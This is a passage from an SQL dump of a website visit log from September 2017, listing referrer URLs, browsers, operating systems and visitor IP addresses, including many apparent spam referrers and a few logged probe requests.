jvVYaZ7MH1gAVDuW4O5Je16Q5L4RxpnIvPXOR0AG7QcTt2PpmCMPL_nHIrCCWc0Wa-Y6r_1iKBgPtUPGX8Stv41nzV0_O84VWF94L4MvWAWkKeNZ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVfOy_uqhbqozp9eXDgqS2TpFjmQnkhoTVomAvIfuuOYmDGdY9WQ_djR7Ov5FjXzwclfx_0OvSOZw&l10n=ru&cts=1505938476759&mc=5.71461850015','Firefox','Windows','53.0','','5.35.58.221','000',1,0),(11435,'2017-09-20','http://zphiblgz.org','MSIE','Windows','6.0','','45.76.153.199','000',2,0),(11436,'2017-09-20','http://zphiblgz.org/','Chrome','Linux','59.0.3071.109','','14.207.128.254','000',1,0),(11437,'2017-09-20','http://zphiblgz.org/','Opera','Windows','12.17','','14.207.128.254','000',2,0),(11438,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.83.25','000',2,0),(11439,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.93.218.204','000',1,0),(11440,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(11441,'2017-09-20','http://x-lime.net/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(11442,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(11443,'2017-09-20','http://zphiblgz.org','Edge','Windows','14.14393','','179.61.175.218','000',1,0),(11444,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','190.10.8.50','000',1,0),(11445,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','77.246.163.141','000',1,0),(11446,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.34.33.2','000',2,0),(11447,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(11448,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.169','000',1,0),(11449,'2017-09-20','http://zphiblgz.org/','Chrome','Windows','33.0.1750.117','','195.22.127.67','000',2,0),(11450,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.237.203.98','000',2,0),(11451,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',1,0),(11452,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(11453,'2017-09-20','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',1,0),(11454,'2017-09-20','http://cool-wedding.net/','MSIE','Windows','5.5','','46.118.158.19','000',3,0),(11455,'2017-09-20','http://irkutsk.zrus.org/','Unknown','Unknown','Unknown','','46.118.158.19','000',3,0),(11456,'2017-09-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','79.172.193.32','000',1,0),(11457,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.170.196','000',1,0),(11458,'2017-09-21','https://minharevisao.com/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(11459,'2017-09-21','http://zphiblgz.org','Firefox','Windows','34.0','','178.204.87.233','000',2,0),(11460,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',2,0),(11461,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',3,0),(11462,'2017-09-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','196.54.55.14','000',1,0),(11463,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','13.93.11.48','000',2,0),(11464,'2017-09-21','http://zphiblgz.org','MSIE','Windows','6.0','','185.147.82.115','000',1,0),(11465,'2017-09-21','https://educontest.net/','MSIE','Windows','5.5','','188.163.72.15','000',2,0),(11466,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.78','000',2,0),(11467,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','118.209.171.131','000',2,0),(11468,'2017-09-21','http://zphiblgz.org','Firefox','Linux','47.0','','45.55.128.5','000',1,0),(11469,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(11470,'2017-09-21','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',8,0),(11471,'2017-09-21','http://03p.info/','Opera','Windows','7.0','','46.118.154.197','000',2,0),(11472,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.218.199','000',2,0),(11473,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','185.134.216.166','000',2,0),(11474,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','118.101.250.51','000',2,0),(11475,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.82.244','000',2,0),(11476,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.115.10.131','000',2,0),(11477,'2017-09-21','http://dverimegapolis.ru/','MSIE','Windows','6.0','','46.118.159.26','000',3,0),(11478,'2017-09-21','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1551.flCqcVFWvB8yr-nr-UYakXFXVhFi_j3ICfWrDW0NaBsYGQN89JO57LTZJk1zKsgb.285840d6f579889585fe5685400448f73f8e3095&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtVNEZCaHY2LVZTN2I0R3gwV3VpUGQzbDFuY1hFZUNLWU4xcXdGVW8zRkxm&b64e=2&sign=80564c927d9b7378c6c2e459a4b0b62d&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlfIvR8fTUxVURKXRA0vf6TT6_qrke2pmUoJM22eLgNQuCuJQJxVzG0pF8Vt_3BjsCOALh1MjN78tjlYDMz7elxTm_zwji28ATxj6HIIr18ZBm-eh7149cOA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntOezIlmQ3bfA3huziBIRmmmT5OIi2sOIwLWKfPAxrj6EGfxIztftn77kbxfLUCmXcA&l10n=ru&cts=1506000722114&mc=2.70554539826','Firefox','Windows','53.0','','176.77.10.51','000',1,0),(11479,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',3,0),(11480,'2017-09-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','97.74.237.196','000',1,0),(11481,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','109.200.175.69','000',2,0),(11482,'2017-09-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','203.129.113.142','000',1,0),(11483,'2017-09-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.62','000',1,0),(11484,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',2,0),(11485,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.11.167.60','000',2,0),(11486,'2017-09-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','173.236.142.123','000',1,0),(11487,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.77','000',1,0),(11488,'2017-09-21','http://zphiblgz.org','MSIE','Windows','11.0','','172.82.186.170','000',1,0),(11489,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.43.205','000',2,0),(11490,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','46.193.66.100','000',2,0),(11491,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',2,0),(11492,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','117.198.51.20','000',2,0),(11493,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(11494,'2017-09-21','http://copro.pw/','Opera','Windows','7.54','','46.118.158.19','000',1,0),(11495,'2017-09-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(11496,'2017-09-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(11497,'2017-09-21','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.91.28','000',1,0),(11498,'2017-09-21','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.95.33','000',2,0),(11499,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.202.66','000',2,0),(11500,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','142.4.211.161','000',2,0),(11501,'2017-09-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','66.85.170.171','000',1,0),(11502,'2017-09-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','46.101.165.68','000',1,0),(11503,'2017-09-21','http://zphiblgz.org/service/appa/','Edge','Windows','15.15063','','73.39.180.237','000',1,0),(11504,'2017-09-21','https://kiskinhouse.com/','Unknown','Unknown','Unknown','','46.118.158.19','000',2,0),(11505,'2017-09-21','https://stillmiracle.com/','Opera','Windows','7.0','','46.118.159.26','000',2,0),(11506,'2017-09-21','http://videochat.mx/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(11507,'2017-09-21','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',2,0),(11508,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.200.20.46','000',2,0),(11509,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.19.181.25','000',2,0),(11510,'2017-09-21','http://zphiblgz.org','Chrome','Windows','43.0.2367.3','','198.46.154.168','000',2,0),(11511,'2017-09-21','https://www.google.com/','Chrome','Android','60.0.3112.116','','173.79.177.240','000',5,0),(11512,'2017-09-21','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.38','000',1,0),(11513,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',2,0),(11514,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','37.124.22.146','000',1,0),(11515,'2017-09-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.37.82','000',2,0),(11516,'2017-09-21','android-app://com.google.android.googlequicksearchbox','Chrome','Android','56.0.2924.87','','66.87.100.96','000',1,0),(11517,'2017-09-21','http://zphiblgz.org','Firefox','Windows','40.1','','81.130.184.149','000',2,0),(11518,'2017-09-22','http://zphiblgz.org','Firefox','Windows','32.0','','94.23.55.119','000',1,0),(11519,'2017-09-22','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1552.IwoWeWyY3aYjURxXe0bw3Uumh_dcp9_AK-n2YYq-U0T_fYgZ1ue-x7r4r7S1AL78.a13df6a866386e3d0e4658c05b5825e2abf429d2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtXZ3VVS1NkUlJ4NHktV1lLYld0R3ZURTJvN1ludk9LLVE2bWExMTh2dk1v&b64e=2&sign=e01f6b8431bd80c4d3553ad51d39c971&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlOPQwzNtNV90SXV985l2IgJyjZAU_ec82aIq9SiQwz0bfRatwccsqQ2bo1tWItDkvkwRghhhVS6fceEVdaoWXZ0MrSg77vA7_spdIDgZ8nNphKx9jB-AS9Qtwo1G2XMAr&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK0yh9-8SuI4c6vc_9-wn0V81ZI30prpCn-ATlhEp1UBrkczZ16ndwE-GNXAexzYRKMQ&l10n=ru&cts=1506056958060&mc=4.42419293435','Firefox','Windows','53.0','','5.228.73.205','000',1,0),(11520,'2017-09-22','http://www.zahvat.ru/','Opera','Windows','8.01','','178.137.177.108','000',3,0),(11521,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','94.156.238.70','000',2,0),(11522,'2017-09-22','http://zphiblgz.org','Safari','iPhone','7.0','','103.210.92.64','000',1,0),(11523,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',2,0),(11524,'2017-09-22','http://zphiblgz.org','MSIE','Windows','6.0','','185.102.136.205','000',1,0),(11525,'2017-09-22','http://zphiblgz.org','MSIE','Windows','11.0','','113.66.41.215','000',9,0),(11526,'2017-09-22','https://kursy-ege.ru/','Unknown','Unknown','Unknown','','188.163.72.15','000',5,0),(11527,'2017-09-22','https://frbizlist.com/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(11528,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.17','000',1,0),(11529,'2017-09-22','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1552.VtRuuQoI7giKzJapCtGU3j5GTLHRYn_sGWXtI_jfXCmGlrTjiY-ob0WpV8nO6USx.aa242b82cb3303d2921d7cc6fb4758e04021e53d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtTX3hjU3hDa3VJV0NjLXFVa1l1ZkZYRWN4eWluQWU4S1dhQzdKQXhRNnk0&b64e=2&sign=979940b43c970f3a6bd1d931560d48dc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrqQI4LqywLX4VYjY4KHmEZLicqabpuyHT--H-MPA7DZBSxn5YKhKFfrhMio0rs78rNq00nJqELSKe8UOGxAoSeSUx8_l8c--IXGm-w1T4CFBhpqh-Hf-EGOvnx-qljp1l&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUPlG4bHKQJvPgLbE715QqA8NHxI5G8-zFjygXAGBVy-AF6S6LOuJAM-Pxmb7qXD_xOA0dko-9n-A&l10n=ru&cts=1506071342642&mc=2.47831185069','Firefox','Windows','53.0','','46.188.52.196','000',1,0),(11530,'2017-09-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.205.173.48','000',1,0),(11531,'2017-09-22','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','104.160.20.135','000',3,0),(11532,'2017-09-22','http://zphiblgz.org','Firefox','Windows','34.0','','176.51.28.108','000',2,0),(11533,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.196','000',1,0),(11534,'2017-09-22','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.223.63','000',1,0),(11535,'2017-09-22','https://klumba55.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(11536,'2017-09-22','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.208.34.227','000',2,0),(11537,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','31.211.142.133','000',2,0),(11538,'2017-09-22','http://zphiblgz.org','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',5,0),(11539,'2017-09-22','http://zphiblgz.org','redback','Unknown','v0','','109.236.8.10','000',2,0),(11540,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','46.172.9.54','000',2,0),(11541,'2017-09-22','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(11542,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','119.92.25.29','000',2,0),(11543,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','80.200.135.142','000',2,0),(11544,'2017-09-22','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','91.121.83.160','000',4,0),(11545,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','91.66.80.161','000',2,0),(11546,'2017-09-22','http://doxyporno.com/','MSIE','Windows','5.5','','46.118.159.26','000',3,0),(11547,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(11548,'2017-09-22','https://buyclomidonlaine.com/','Unknown','Unknown','Unknown','','46.118.154.197','000',2,0),(11549,'2017-09-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(11550,'2017-09-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(11551,'2017-09-22','https://www.google.com/','Chrome','iPhone','61.0.3163.73','','172.56.23.109','000',2,0),(11552,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(11553,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.151.47','000',2,0),(11554,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.13','000',2,0),(11555,'2017-09-22','http://zphiblgz.org','Firefox','Windows','40.1','','189.158.32.227','000',2,0),(11556,'2017-09-22','http://www.anabolics.shop/','MSIE','Windows','6.0','','46.118.158.19','000',3,0),(11557,'2017-09-22','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.137.92','000',1,0),(11558,'2017-09-22','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1552.GboX5ox9KYoibkXU3Wt0QBVUzO6GmgA_VdUJvR6AL1Fd4fFtW3ugwfoVU4DYedNL.9f3344a55c8b3d5f78539437b0e1b622bebfc57e&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtaWjU4S01mbTlSZ0tRdTQzcm1TcW16eVozRDlJeGNvT00xTERueDd1T3pR&b64e=2&sign=bb8f6984c4cb2a557a993d06a71d8e62&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbi-m1Cp6Bid6goe1fxSFGibU0NgE5-I0HZ2hXyGXe6fWMeDVvpXr6XJdHXyAFOM_clet-4aurK6FFioa2vDuRf4U_gqpVJL6WsMNJw6YiXxTsytrFpVF0Q7yS2O2-Fkpyi&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aIAdibaupgF60sBztDuptdTYAwpqHpWspo-m8TmjwYNrFFsLdb7cDC123W9r0xvHcJA&l10n=ru&cts=1506119219628&mc=6.57777349302','Firefox','Windows','53.0','','37.204.68.12','000',1,0),(11559,'2017-09-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.192','000',2,0),(11560,'2017-09-22','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(11561,'2017-09-22','https://educontest.net/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(11562,'2017-09-22','https://www.google.com/','Safari','Macintosh','9.1.2','','76.100.200.217','000',12,0),(11563,'2017-09-22','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.35.179','000',7,0),(11564,'2017-09-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(11565,'2017-09-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(11566,'2017-09-22','http://zphiblgz.org/wp-xmlrpc.php?secret=111','Chrome','Windows','42.0.2311.152','','163.172.255.139','000',1,0),(11567,'2017-09-23','http://zphiblgz.org','Firefox','Windows','34.0','','92.127.172.122','000',2,0),(11568,'2017-09-23','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.239','000',3,0),(11569,'2017-09-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(11570,'2017-09-23','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',2,0),(11571,'2017-09-23','http://nextrent-crimea.ru/','MSIE','Windows','6.0','','46.118.154.197','000',2,0),(11572,'2017-09-23','http://zphiblgz.org','Firefox','Windows','51.0','','31.132.1.137','000',1,0),(11573,'2017-09-23','http://macrotek.ru/','MSIE','Windows','3.02','','188.163.72.15','000',3,0),(11574,'2017-09-23','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1553.UvcncyE8F0mpWHx6GDH3FuC1lj-LZ7UozyuXI04twOOYRtetQ-mgbXBorolRjVXo.8a90c6c8aff01e84985ea8127e86d7d16fed01bf&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtSYy1BZlI4V0Q3VkNuNmxpdjgycDJCY2ZFVU5qN25EX2FKMFJuV29rUzN1&b64e=2&sign=81a0b725498cc68cc3d82873ddee4b46&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbi75QJbgacyVg-Av8w8-7PpGe6SBRztOjQDaRFG_zxClAnx7o-oRJkcoQwi_4a-GzJ6Ke-pu9Oxq2XiXJYbTJmZCRxmJEbHqT0svCMiIBcarWYQ6GXwxGTqA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWLmUMpz38pRJ2HryazByHR5kqO07Hdq-4zDplUs_ezMAN6KfEmbTpCXMIDZ8SToTx3U0RGjeMVAw&l10n=ru&cts=1506155267389&mc=5.17304682524','Firefox','Windows','53.0','','195.91.224.113','000',1,0),(11575,'2017-09-23','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(11576,'2017-09-23','http://zphiblgz.org','Firefox','Windows','34.0','','83.149.47.133','000',2,0),(11577,'2017-09-23','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.217.246','000',46,0),(11578,'2017-09-23','https://stillmiracle.com/','MSIE','Windows','6.0','','46.118.159.26','000',5,0),(11579,'2017-09-23','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.142.132','000',20,0),(11580,'2017-09-23','http://zphiblgz.org','Firefox','Windows','32.0','','104.37.84.70','000',1,0),(11581,'2017-09-23','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.185.0.83','000',54,0),(11582,'2017-09-23','https://kiskinhouse.com/','MSIE','Windows','6.0','','46.118.158.19','000',1,0),(11583,'2017-09-23','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(11584,'2017-09-23','http://zphiblgz.org','Safari','iPhone','6.0','','106.120.173.79','000',2,0),(11585,'2017-09-23','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.154.58','000',14,0),(11586,'2017-09-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(11587,'2017-09-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.100.224','000',1,0),(11588,'2017-09-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.172.223','000',13,0),(11589,'2017-09-23','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.172.223','000',1,0),(11590,'2017-09-23','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.19','000',1,0),(11591,'2017-09-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(11592,'2017-09-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(11593,'2017-09-23','http://zphiblgz.org','Chrome','iPhone','61.0.3163.73','','208.54.36.189','000',2,0),(11594,'2017-09-23','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.183.13','000',29,0),(11595,'2017-09-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.255.253.173','000',2,0),(11596,'2017-09-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',2,0),(11597,'2017-09-23','http://zphiblgz.org','Firefox','Windows','40.1','','115.133.39.14','000',2,0),(11598,'2017-09-23','https://spb-plitka.ru/','Unknown','Unknown','Unknown','','188.163.72.15','000',1,0),(11599,'2017-09-23','https://www.google.com/','Chrome','iPhone','61.0.3163.73','','71.120.1.224','000',3,0),(11600,'2017-09-23','http://zphiblgz.org','Firefox','Windows','40.1','','198.144.128.53','000',2,0),(11601,'2017-09-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11602,'2017-09-23','http://komputers-best.ru/','Opera','Windows','8.01','','46.118.159.26','000',1,0),(11603,'2017-09-23','https://mmostrike.ru/','Unknown','Unknown','Unknown','','46.118.154.197','000',3,0),(11604,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.139.161','000',1,0),(11605,'2017-09-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.12','000',1,0),(11606,'2017-09-24','http://krassh.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(11607,'2017-09-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1554.WrKP7YmQPRChScNQQC_uwr0J_akPnGRqjvdH7YffJTtt_W34MAYHq1I3lV721Uuh.83f0312f3f7d1fa04249b195901bfc3a1d3aa01c&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamthYWJqUU1RUTlkWVNBa0FMbUhsVVhaRk9fQ002ak1NT05Ia3hWNHZFcnRh&b64e=2&sign=420770464e17d0e7fcbbc186f44d5912&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96Fza739vnICRcLB8_I0sBvp07XZZGn6AtwYBPfwEgj-N7XJqdkL9eZqFog6yXv2bylESdCV2IKOBpzZIIm43RyMKQEVpT64nQy2i4mDcjLv7NTZfTmqe_XgcTvlsB1EJBV&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWAB4NbWhozjoVL-X--gJ1tt2rOYrsHL-DPZ9oj4TuV1oBRvfS-Y_iiqP2kj7mD4DuaHCmh1DipyQ&l10n=ru&cts=1506232973421&mc=6.64028746383','Firefox','Windows','53.0','','37.147.250.165','000',1,0),(11608,'2017-09-24','http://zphiblgz.org','Chrome','Windows','43.0.2357.81','','38.140.157.84','000',2,0),(11609,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.19','000',2,0),(11610,'2017-09-24','http://zphiblgz.org','Chrome','Windows','10.0.649.0','','37.59.55.128','000',2,0),(11611,'2017-09-24','http://zphiblgz.org','Firefox','Windows','40.1','','183.82.198.185','000',2,0),(11612,'2017-09-24','http://zphiblgz.org','Firefox','Windows','40.1','','41.69.84.67','000',2,0),(11613,'2017-09-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1554.NdB2zH4zp8cHoMK5nObuCAXmHOFGEFg1fA9noSUftUa0BcfMAh2kj9TG8NDwgqp0.22aa417b9e12e7cb45d2ff257c4832580135bfa4&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtaVlNuc2hQZFVaM2M0YVhPQU1mTEVQZm82SENKQzdDeVdQazNPUEw1SXNX&b64e=2&sign=588213de5fc0bcc88f8abf746baa7194&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiueqdJnLjdOl_GkbnKLrM3XKxPgyDqNfT_9j_PrJtd_LQ2HEvzyr-Qzcl9UEaX_3wMACVFpqRbzGtvP2eydZSccj0FtMuzGymqS3qlSnRefa7AoFXQ926Qg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4VJC_OGpcPayZ9QjWb7P5im4ExlUatejAETr-B1heYEm86sxn2V7VWqIknleutczpw&l10n=ru&cts=1506252643696&mc=6.81200297287','Firefox','Windows','53.0','','178.140.231.7','000',1,0),(11614,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.98','000',2,0),(11615,'2017-09-24','https://mojpregled.com/','Unknown','Unknown','Unknown','','188.163.72.15','000',3,0),(11616,'2017-09-24','http://cool-wedding.net/','MSIE','Windows','6.0','','46.118.158.19','000',3,0),(11617,'2017-09-24','https://www.google.com/','Chrome','iPhone','61.0.3163.73','','172.58.184.191','000',6,0),(11618,'2017-09-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.125','000',1,0),(11619,'2017-09-24','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',1,0),(11620,'2017-09-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(11621,'2017-09-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(11622,'2017-09-24','http://zphiblgz.org','Firefox','Windows','40.1','','66.190.149.232','000',2,0),(11623,'2017-09-24','http://zphiblgz.org','Chrome'